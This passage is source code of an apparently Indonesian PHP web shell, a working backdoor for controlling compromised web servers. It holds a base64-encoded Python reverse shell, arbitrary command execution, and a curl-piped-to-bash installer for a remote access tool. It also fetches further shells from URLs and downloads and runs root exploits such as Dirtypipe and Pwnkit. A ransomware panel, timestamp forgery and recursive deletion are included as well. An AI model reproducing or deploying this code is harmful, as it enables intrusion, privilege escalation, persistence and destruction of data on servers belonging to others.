$GLOBALS['fungsi'][6]("IyEvdXNyL2Jpbi9weXRob24NCiNVc2FnZTogcHl0aG9uIGZpbGVuYW1lLnB5IEhPU1QgUE9SVA0KaW1wb3J0IHN5cywgc29ja2V0LCBvcywgc3VicHJvY2Vzcw0KaXBsbyA9IHN5cy5hcmd2WzFdDQpwb3J0bG8gPSBpbnQoc3lzLmFyZ3ZbMl0pDQpzb2NrZXQuc2V0ZGVmYXVsdHRpbWVvdXQoNjApDQpkZWYgcHliYWNrY29ubmVjdCgpOg0KICB0cnk6DQogICAgam1iID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pDQogICAgam1iLmNvbm5lY3QoKGlwbG8scG9ydGxvKSkNCiAgICBqbWIuc2VuZCgnJydcblB5dGhvbiBCYWNrQ29ubmVjdCBCeSBNci54QmFyYWt1ZGFcblRoYW5rcyBHb29nbGUgRm9yIFJlZmVyZW5zaVxuXG4nJycpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMCkNCiAgICBvcy5kdXAyKGptYi5maWxlbm8oKSwxKQ0KICAgIG9zLmR1cDIoam1iLmZpbGVubygpLDIpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMykNCiAgICBzaGVsbCA9IHN1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdKQ0KICBleGNlcHQgc29ja2V0LnRpbWVvdXQ6DQogICAgcHJpbnQgIlRpbU91dCINCiAgZXhjZXB0IHNvY2tldC5lcnJvciwgZToNCiAgICBwcmludCAiRXJyb3IiLCBlDQpweWJhY2tjb25uZWN0KCk="); $pbc_py = @fopen('bcpy.py','w'); fwrite($pbc_py,$bc_py); $out_py = exe("python bcpy.py ".$_7['server']." ".$_7['port']); sleep(1); echo "<pre>$out_py\n".exe("ps aux | grep bcpy.py")."</pre>"; $GLOBALS['fungsi'][4]("bcpy.py"); } echo "</div> </div> <br/>"; } if ($_7['id'] == 'cmd') { s(); $cmdResult = ''; $command = ''; if (!empty($_POST['cmd'])) { $command = htmlspecialchars($_POST['cmd'], ENT_QUOTES, 'UTF-8'); $cmdResult = shell_exec($command . ' 2>&1'); if ($cmdResult === null) { $output = array(); $return_var = 0; exec($command, $output, $return_var); $cmdResult = implode("\n", $output); if ($cmdResult === null) { $descriptorspec = array( 0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w") ); $process = proc_open($command, $descriptorspec, $pipes); if (is_resource($process)) { $cmdResult = stream_get_contents($pipes[1]); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); $return_value = proc_close($process); if ($return_value !== 0) { $cmdResult = "Error: Non-zero return value ($return_value)"; } } else { $cmdResult = "Error: Failed to open process with proc_open"; } } } } echo " <div class='mb-3'> <form method='POST'> <div class='input-group mb-3'> <input class='form-control btn-sm' type='text' name='cmd' value='" . htmlspecialchars($_POST['cmd'], ENT_QUOTES, 'UTF-8') . "' placeholder='whoami' $_r> <button class='btn btn-outline-light btn-sm' type='submit'><i class='bi bi-arrow-return-right'></i></button> </div> </form>"; if (!empty($cmdResult)) { echo " <div class='container-fluid language-javascript' style='background: #0c0e14;'> <div class='shell mb-3'> <pre style='font-size:10px;'><gr>~</gr>\$ <rd>{$command}</rd><br><code>" . htmlspecialchars($cmdResult, ENT_QUOTES, 'UTF-8') . "</code></pre> </div> </div>"; } elseif ($_SERVER['REQUEST_METHOD'] == 'POST') { echo " <div class='container-fluid language-javascript' style='background: #0c0e14;'> <div class='shell mb-3'> <pre style='font-size:10px;'><code>No result</code></pre> </div> </div> </div>"; } } // Upload if($_7['id'] == 'upload'){ s(); if(isset($_7['upl'])){ $result = count($_FILES['file']['name']); for($contents=0;$contents<$result;$contents++){ $namefile = $_FILES['file']['name'][$contents]; $up = @copy($_FILES['file']['tmp_name'][$contents],"$path/".$namefile); } if($result < 2){ if($up){ echo "<strong>Upload</strong> $namefile ok! ".ok()."</div>"; }else{ echo '<strong>Upload</strong> fail! '.er().'</div>'; } }else{ echo "<strong>Upload</strong> $result ok! ".ok()."</div>"; } } echo " <div class='card card-body text-dark input-group mb-3'> <u>Multiple upload</u> <form method='POST' enctype='multipart/form-data'> <div class='input-group'> <input class='form-control form-control-sm' type='file' name='file[]' multiple='' $_r> <input class='btn btn-dark btn-sm' type='submit' name='upl' value='upload'> </div> </form> </div>"; } if ($_7['id'] == 'installgs') { echo ' <br> <div class="container-fluid language-javascript" style="background: #0c0e14; border: 1px solid #ff0000;"> <div class="shell mb-3" style="margin-top: 10px;"> <pre style="font-size:10px;"><code>'.exe('bash -c "$(curl -fsSL https://gsocket.io/y)"').'</code></pre> </div> </div>'; } // Upload Via Link raw if ($_7['id'] == 'uploadvialink') { s(); if ($_SERVER['REQUEST_METHOD'] === 'POST') { $url = isset($_POST['url']) ? trim($_POST['url']) : ''; $namafile = isset($_POST['namafile']) ? trim($_POST['namafile']) : 'cong.php'; if (filter_var($url, FILTER_VALIDATE_URL)) { $content = file_get_contents($url); if ($content !== false) { $filePath = getcwd() . '/' . $namafile; $result = file_put_contents($filePath, $content); if ($result !== false) { echo "<div><strong>Upload</strong> ok! Saved as $namafile " . ok() . "</div>"; } else { echo '<div><strong>Upload</strong> fail! ' . er() . '</div>'; } } else { echo '<div><strong>Upload</strong> fail! ' . er() . '</div>'; } } else { echo '<div><strong>Invalid URL</strong></div>'; } } echo " <div class='card card-body text-dark input-group mb-3'> <u>Upload Via Link</u> <form method='POST' enctype='multipart/form-data'> <div class='input-group'> <input class='form-control form-control-sm' type='url' name='url' placeholder='Enter the link' value='https://raw.githubusercontent.com/Chan315/MiniShell/refs/heads/main/ShellPass.php' required> </div> <div class='input-group'> <input class='form-control form-control-sm' type='text' name='namafile' placeholder='Save As' value='cong.php'> </div> <div class='input-group'> <button type='submit' name='upl' class='btn btn-primary'>Upload</button> </div> </form> </div>"; } if (isset($_GET['dir']) && $_GET['id'] == "ransomware") { ob_implicit_flush();ob_end_flush();s(); echo " <div class='text-center' style='background-color: black; border: 1px solid red;'> <pre style='color: red;'>⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣤⣤⣤⣄⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⢀⣴⣾⣿⣿⣿⣿⣿⣿⣿⣿⣷⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⣰⣿⣿⣿⠟⠉⠀⠀⠀⠈⠙⠿⣿⣿⣷⡄⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⢰⣿⣿⡿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠙⣿⣿⣿⡀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⣸⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢹⣿⣿⡇⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⣿⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡇⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⢿⣿⣿⠇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠸⣿⣿⡇⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⢠⣤⣤⣤⣤⣤⣤⣤⣤⣤⣤⣤⣤⣤⣤⣤⣤⣤⣤⣤⣤⡀⠀⠀⠀⠀ ⠀⠀⠀⠀⣿⣿⣿⣿⣿⣿⣿⣿⡿⠋⠉⠉⠛⣿⣿⣿⣿⣿⣿⣿⣿⣷⠀⠀⠀⠀ ⠀⠀⠀⠀⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⠀⠀⠀⣸⣿⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀⠀ ⠀⠀⠀⠀⣿⣿⣿⣿⣿⣿⣿⣿⣿⡶⠀⠀⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀⠀ ⠀⠀⠀⠀⢻⣿⣿⣿⣿⣿⣿⣿⣿⠃⠀⠀⠸⣿⣿⣿⣿⣿⣿⣿⣿⠏⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠙⢿⣿⣿⣿⣿⣿⡏⠀⠀⠀⠀⢻⣿⣿⣿⣿⣿⡿⠃⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠈⠛⢿⣿⣿⣶⣶⣶⣶⣶⣾⣿⣿⠿⠛⠁⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⠉⠙⠛⠛⠉⠉⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀</pre> <input class='input-ransom' style='text-align: center;' type='text' placeholder='key'> <br> <a class='btn-ransom' style='text-decoration: none;' type='button' href='".$_SERVER['REQUEST_URI']."&id_two=konciiii'>Gasak</a> </div>"; } if (isset($_GET['dir']) && $_GET['id'] == "scan_root") { ob_implicit_flush();ob_end_flush();s(); echo " <div class='text-center'> <div class='btn-group mb-3'> <a class='btn btn-outline-light btn-sm' href='".$_SERVER['REQUEST_URI']."&id_two=autoscan'><i class='bi bi-bug'></i> Auto scan</a> <a class='btn btn-outline-light btn-sm' href='".$_SERVER['REQUEST_URI']."&id_two=scansd'><i class='bi bi-search'></i> Scan SUID</a> <a class='btn btn-outline-light btn-sm' href='".$_SERVER['REQUEST_URI']."&id_two=esg'><i class='bi bi-search'></i> Exploit suggester</a> </div> </div>";if (!$GLOBALS['fungsi'][5]("proc_open")) { echo "<center class='anu'>Command is Disabled !</center>"; } if (!is_writable($path)) { echo "<center class='anu'>Current Directory is Unwriteable !</center>"; } if (isset($_GET['id_two']) && $_GET['id_two'] == "autoscan") { if (!file_exists($path."/rooting/")) { mkdir($path."/rooting"); exe_root("wget https://raw.githubusercontent.com/hekerprotzy/rootshell/main/auto.tar.gz", $path."/rooting"); exe_root("tar -xf auto.tar.gz", $path."/rooting"); if (!file_exists($path."/rooting/netfilter")) { die("<center class='anu'>Failed to Download Material !</center>"); } } echo ' <div class="container-fluid language-javascript" style="background: #0c0e14; border: 1px solid #ff0000;"> <div class="shell mb-3" style="margin-top: 10px;"> <pre style="font-size:10px;"><code>Netfilter : '.exe_root("timeout 10 ./rooting/netfilter", $path).'Ptrace : '.exe_root("echo id | timeout 10 ./rooting/ptrace", $path).'Sequoia : '.exe_root("timeout 10 ./rooting/sequoia", $path).'OverlayFS : '.exe_root("echo id | timeout 10 ./overlayfs", $path."/rooting").'Dirtypipe : '.exe_root("echo id | timeout 10 ./rooting/dirtypipe /usr/bin/su", $path).'Sudo : '.exe_root("echo 12345 | timeout 10 sudoedit -s Y", $path).'Pwnkit : '.exe_root("echo id | timeout 10 ./pwnkit", $path."/rooting").@exe("rm -rf ./rooting | timeout 10 ").'</code></pre> </div> </div>'; } elseif ($_GET['id_two'] == "konciiii") { echo "<script>alert(1)</script>"; // echo '<center class="anu">[+] Scanning ...</center>'; // echo ' // <div class="container-fluid language-javascript" style="background: #0c0e14; border: 1px solid #ff0000;"> // <div class="shell mb-3" style="margin-top: 10px;"> // <pre style="font-size:10px;"><code>'.exe_root("find / -perm -u=s -type f 2>/dev/null", $path).'</code></pre> // </div> // </div>'; } elseif (isset($_GET['id_two']) && $_GET['id_two'] == "scansd") { echo '<center class="anu">[+] Scanning ...</center>'; echo ' <div class="container-fluid language-javascript" style="background: #0c0e14; border: 1px solid #ff0000;"> <div class="shell mb-3" style="margin-top: 10px;"> <pre style="font-size:10px;"><code>'.exe_root("find / -perm -u=s -type f 2>/dev/null", $path).'</code></pre> </div> </div>'; } elseif (isset($_GET['id_two']) && $_GET['id_two'] == "esg") { echo '<center class="anu">[+] Loading ...</center>'; echo ' <div class="container-fluid language-javascript" style="background: #0c0e14; border: 1px solid #ff0000;"> <div class="shell mb-3" style="margin-top: 10px;"> <pre style="font-size:10px;"><code>'.exe_root("curl -Lsk http://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh | bash", $path).'</code></pre> </div> </div>'; } } // openfile if(isset($_7['opn'])) { $file = $_7['opn']; } // view if($_7['action'] == 'view') { s(); echo " <div class='btn-group'> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=view&opn=$path/$file'><i class='bi bi-eye-fill'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=edit&opn=$path/$file'><i class='bi bi-pencil-square'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=unzip_file&opn=$file'><i class='bi bi-file-zip-fill'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=touch_file&opn=$path/$file'><i class='bi bi-calendar'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=rename&opn=$path/$file'><i class='bi bi-pencil-fill'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=chmod&opn=$path/$file'><i class='bi bi-file-lock-fill'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=delete_file&opn=$path/$file'><i class='bi bi-trash-fill'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=download&opn=$path/$file'><i class='bi bi-download'></i></a> </div> <br> <i class='bi bi-file-earmark'></i>: ".basename($file)." </br> <div class='bg-dark'> <div class='container-fluid language-javascript'> <textarea rows='15' class='form-control' disabled=''>".htmlspecialchars($fungsi[0]($file))."</textarea> </div> </div>"; } // Edit File if(isset($_7['edit_file'])) { $updt = fopen("$file", "w"); $result = fwrite($updt, $_7['contents']); if ($result) { echo '<strong>Edit file</strong> ok! '.ok().'</div>'; }else{ echo '<strong>Edit file</strong> fail! '.er().'</div>';} } if($_7['action'] == 'edit') { s(); echo " <div class='btn-group'> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=view&opn=$path/$file'><i class='bi bi-eye-fill'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=edit&opn=$path/$file'><i class='bi bi-pencil-square'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=unzip_file&opn=$file'><i class='bi bi-file-zip-fill'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=touch_file&opn=$path/$file'><i class='bi bi-calendar'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=rename&opn=$path/$file'><i class='bi bi-pencil-fill'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=chmod&opn=$path/$file'><i class='bi bi-file-lock-fill'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=delete_file&opn=$path/$file'><i class='bi bi-trash-fill'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=download&opn=$path/$file'><i class='bi bi-download'></i></a> </div> <br> <i class='bi bi-file-earmark'></i>: ".basename($file)." </br> <form method='POST'> <textarea class='form-control btn-sm' rows='15' name='contents' $_r>".htmlspecialchars($fungsi[0]($file))."</textarea> <div class='d-grid gap-2'> <button class='btn btn-outline-light btn-sm' type='sumbit' name='edit_file'><i class='bi bi-arrow-return-right'></i></button> </div> </form>"; } // Rename File if(isset($_7['r_f'])) { $old = $file; $new = $_7['new_name']; rename($new, $old); if(file_exists($new)) { echo '<div class="alert alert-warning alert-dismissible fade show my-3" role="alert"> <strong>Rename file</strong> name already in use! <button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button> </div>'; }else{ if(rename($old, $new)) { echo '<strong>Rename file</strong> ok! '.ok().'</div>'; }else{ echo '<strong>Rename file</strong> fail! '.er().'</div>'; } } } if($_7['action'] == 'rename') { s(); echo " <div class='btn-group'> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=view&opn=$path/$file'><i class='bi bi-eye-fill'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=edit&opn=$path/$file'><i class='bi bi-pencil-square'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=unzip_file&opn=$file'><i class='bi bi-file-zip-fill'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=touch_file&opn=$path/$file'><i class='bi bi-calendar'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=rename&opn=$path/$file'><i class='bi bi-pencil-fill'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=chmod&opn=$path/$file'><i class='bi bi-file-lock-fill'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=delete_file&opn=$path/$file'><i class='bi bi-trash-fill'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=download&opn=$path/$file'><i class='bi bi-download'></i></a> </div> <br> <i class='bi bi-file-earmark'></i>: ".basename($file)." </br> <form method='POST'> <div class='input-group'> <input class='form-control btn-sm' type='text' name='new_name' value='".basename($file)."' $_r> <button class='btn btn-outline-light btn-sm' type='sumbit' name='r_f'><i class='bi bi-arrow-return-right'></i></button> </div> </form>"; } // Unzip if ($_7['action'] == 'unzip_file') { s(); if ($_7['yeahx']) { $zipFile = $file; $extractTo = $GLOBALS['fungsi'][7](); $zip = new ZipArchive(); if ($zip->open($zipFile) === true) { $zip->extractTo($extractTo); $zip->close(); echo '<strong>Unzip file</strong> ok! ' . ok() . '</div>'; } else { echo '<strong>Unzip file</strong> fail! ' . er() . '</div>'; } } echo " <div class='btn-group mb-3'> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=view&opn=$path/$file'><i class='bi bi-eye-fill'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=edit&opn=$path/$file'><i class='bi bi-pencil-square'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=unzip_file&opn=$file'><i class='bi bi-file-zip-fill'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=touch_file&opn=$path/$file'><i class='bi bi-calendar'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=rename&opn=$path/$file'><i class='bi bi-pencil-fill'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=chmod&opn=$path/$file'><i class='bi bi-file-lock-fill'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=delete_file&opn=$path/$file'><i class='bi bi-trash-fill'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=download&opn=$path/$file'><i class='bi bi-download'></i></a> </div> <div class='card card-body text-dark input-group mb-3'> <p>Are you sure to unzip : " . basename($file) . " ?</p> <form method='POST'> <a class='btn btn-danger btn-block btn-sm' href='?dir=" . hex($dir) . "'>No</a> <input type='submit' name='yeahx' class='btn btn-success btn-block btn-sm' value='Yes'> </form> </div>"; } // Touch File if ($_7['action'] == 'touch_file') { s(); $fileTimestamp = date('d-m-Y H:i:s', filemtime($file)); if ($_7['yeahx']) { $old = $file; $new = $_POST['new_touch']; if (strtotime($new) !== false) { if (touch($old, strtotime($new))) { echo '<strong>Touch file</strong> ok! ' . ok() . '</div>'; } else { echo '<strong>Touch file</strong> fail! ' . er() . '</div>'; } } else { echo '<div class="alert alert-warning alert-dismissible fade show my-3" role="alert"> <strong>Touch file</strong> invalid timestamp format! <button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button> </div>'; } } echo " <div class='btn-group mb-3'> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=view&opn=$path/$file'><i class='bi bi-eye-fill'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=edit&opn=$path/$file'><i class='bi bi-pencil-square'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=rename&opn=$path/$file'><i class='bi bi-pencil-fill'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=unzip_file&opn=$file'><i class='bi bi-file-zip-fill'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=touch_file&opn=$path/$file'><i class='bi bi-calendar'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=chmod&opn=$path/$file'><i class='bi bi-file-lock-fill'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=delete_file&opn=$path/$file'><i class='bi bi-trash-fill'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=download&opn=$path/$file'><i class='bi bi-download'></i></a> </div>"; echo " <div class='card card-body text-dark input-group mb-3'> <p>Are you sure to touch the file : " . basename($file) . " ?</p> <form method='POST'> <input type='text' name='new_touch' id='new_touch' class='form-control' value='$fileTimestamp' required> <a class='btn btn-danger btn-block btn-sm' href='?dir=" . hex($dir) . "'>No</a> <input type='submit' name='yeahx' class='btn btn-success btn-block btn-sm' value='Yes'> </form> </div>"; } // Chmod if ($_7['action'] == 'chmod') { s(); $fileToChmod = $file; $currentChmod = fileperms($fileToChmod); $FileChmod = substr(sprintf('%o', $currentChmod), -4); if (isset($_POST['cehamot'])) { if (isset($_7['new_chmod'])) { $newChmod = $_7['new_chmod']; $newChmodOctal = octdec($newChmod); if (is_numeric($newChmod)) { if (chmod($fileToChmod, $newChmodOctal)) { echo '<div class="alert alert-warning alert-dismissible fade show my-3" role="alert"> <strong>Chmod file</strong> Success! </div>'; } else { echo '<div class="alert alert-danger alert-dismissible fade show my-3" role="alert"> <strong>Chmod file</strong> Failed! Please check file permissions. </div>'; } } else { echo '<div class="alert alert-danger alert-dismissible fade show my-3" role="alert"> Invalid permissions value. </div>'; } } } echo " <div class='btn-group'> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=view&opn=$path/$file'><i class='bi bi-eye-fill'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=edit&opn=$path/$file'><i class='bi bi-pencil-square'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=rename&opn=$path/$file'><i class='bi bi-pencil-fill'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=unzip_file&opn=$file'><i class='bi bi-file-zip-fill'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=touch_file&opn=$path/$file'><i class='bi bi-calendar'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=chmod&opn=$path/$file'><i class='bi bi-file-lock-fill'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=delete_file&opn=$path/$file'><i class='bi bi-trash-fill'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=download&opn=$path/$file'><i class='bi bi-download'></i></a> </div> <br> <i class='bi bi-file-earmark'></i>: " . basename($file) . " </br> <form method='POST'> <div class='input-group'> <input class='form-control btn-sm' type='text' name='new_chmod' value='$FileChmod'> <button class='btn btn-outline-light btn-sm' type='submit' name='cehamot'><i class='bi bi-arrow-return-right'></i></button> </div> </form>"; } // Delete File if ($_7['action'] == 'delete_file') { s(); if ($_7['yeahx']) { $delete = $GLOBALS['fungsi'][4]($file); if ($delete) { echo '<strong>Delete file</strong> ok! '.ok().'</div>'; }else{ echo '<strong>Delete file</strong> fail! '.er().'</div>'; } } echo " <div class='btn-group mb-3'> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=view&opn=$path/$file'><i class='bi bi-eye-fill'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=edit&opn=$path/$file'><i class='bi bi-pencil-square'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=unzip_file&opn=$file'><i class='bi bi-file-zip-fill'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=touch_file&opn=$path/$file'><i class='bi bi-calendar'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=rename&opn=$path/$file'><i class='bi bi-pencil-fill'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=chmod&opn=$path/$file'><i class='bi bi-file-lock-fill'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=delete_file&opn=$path/$file'><i class='bi bi-trash-fill'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=download&opn=$path/$file'><i class='bi bi-download'></i></a> </div> <div class='card card-body text-dark input-group mb-3'> <p>Are you sure to delete : ".basename($file)." ?</p> <form method='POST'> <a class='btn btn-danger btn-block btn-sm' href='?dir=".hex($dir)."'>No</a> <input type='submit' name='yeahx' class='btn btn-success btn-block btn-sm' value='Yes'> </form> </div>"; } // Rename Folder if($_7['action'] == 'rename_folder') { if($_7['r_d']) { $r_d = rename($dir, "".dirname($dir)."/".htmlspecialchars($_7['r_d']).""); if($r_d) { echo '<strong>Rename folder</strong> ok! '.ok().'<a class="btn-close" href="?path='.dirname($dir).'"></a></div>'; }else{ echo '<strong>Rename folder</strong> fail! '.er().'<a class="btn-close" href="?path='.dirname($dir).'"></a></div>'; } } s(); echo " <div class='btn-group'> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=rename_folder'><i class='bi bi-pencil-fill'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=zip_folder'><i class='bi bi-file-zip-fill'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=touch_folder'><i class='bi bi-calendar'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=chmod_folder'><i class='bi bi-file-lock-fill'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=delete_folder'><i class='bi bi-trash-fill'></i></a> </div> <br> <i class='bi bi-folder-fill'></i>: ".basename($dir)." </br> <form method='POST'> <div class='input-group'> <input class='form-control btn-sm' type='text' value='".basename($dir)."' name='r_d' $_r> <button class='btn btn-outline-light btn-sm' type='submit'><i class='bi bi-arrow-return-right'></i></button> </div> </form>"; } // Delete Folder if ($_7['action'] == 'delete_folder' ) { s(); if ($_7['yeah']) { if($fungsi[1]($dir)) { if(is_writable($dir)) { @rmdir($dir); @exe("rm -rf $dir"); @exe("rmdir /s /q $dir"); echo '<strong>Delete folder</strong> ok! '.ok().'<a class="btn-close" href="?path='.dirname($dir).'"></a></div>'; } else { echo '<strong>Delete folder</strong> fail! '.er().'<a class="btn-close" href="?path='.dirname($dir).'"></a></div>'; } } } echo " <div class='btn-group mb-3'> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=rename_folder'><i class='bi bi-pencil-fill'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=zip_folder'><i class='bi bi-file-zip-fill'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=touch_folder'><i class='bi bi-calendar'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=chmod_folder'><i class='bi bi-file-lock-fill'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=delete_folder'><i class='bi bi-trash-fill'></i></a> </div> <div class='card card-body text-dark input-group mb-3'> <p>Are you sure to delete : ".basename($dir)." ?</p> <form method='POST'> <a class='btn btn-danger btn-block btn-sm' href='?dir=".dirname($dir)."'>No</a> <input type='submit' name='yeah' class='btn btn-success btn-block btn-sm' value='Yes'> </form> </div>"; } // Zip Folder if ($_7['action'] == 'zip_folder') { s(); if ($_7['yeah']) { $zipFile = $dir . '.zip'; $zip = new ZipArchive(); if ($zip->open($zipFile, ZipArchive::CREATE) === true) { $source = realpath($dir); $zip->addEmptyDir(basename($source)); $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source)); foreach ($iterator as $file) { if ($file->isDir()) { $zip->addEmptyDir($source . '/' . $iterator->getSubPathName()); } else { $zip->addFile($file, $iterator->getSubPathName()); } } $zip->close(); echo '<strong>Zip folder</strong> ok! ' . ok() . '<a class="btn-close" href="?path=' . dirname($dir) . '"></a></div>'; } else { echo '<strong>Zip folder</strong> fail! ' . er() . '<a class="btn-close" href="?path=' . dirname($dir) . '"></a></div>'; } } echo " <div class='btn-group mb-3'> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=rename_folder'><i class='bi bi-pencil-fill'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=zip_folder'><i class='bi bi-file-zip-fill'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=touch_folder'><i class='bi bi-calendar'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=chmod_folder'><i class='bi bi-file-lock-fill'></i></a> <a class='btn btn-outline-light btn-sm' 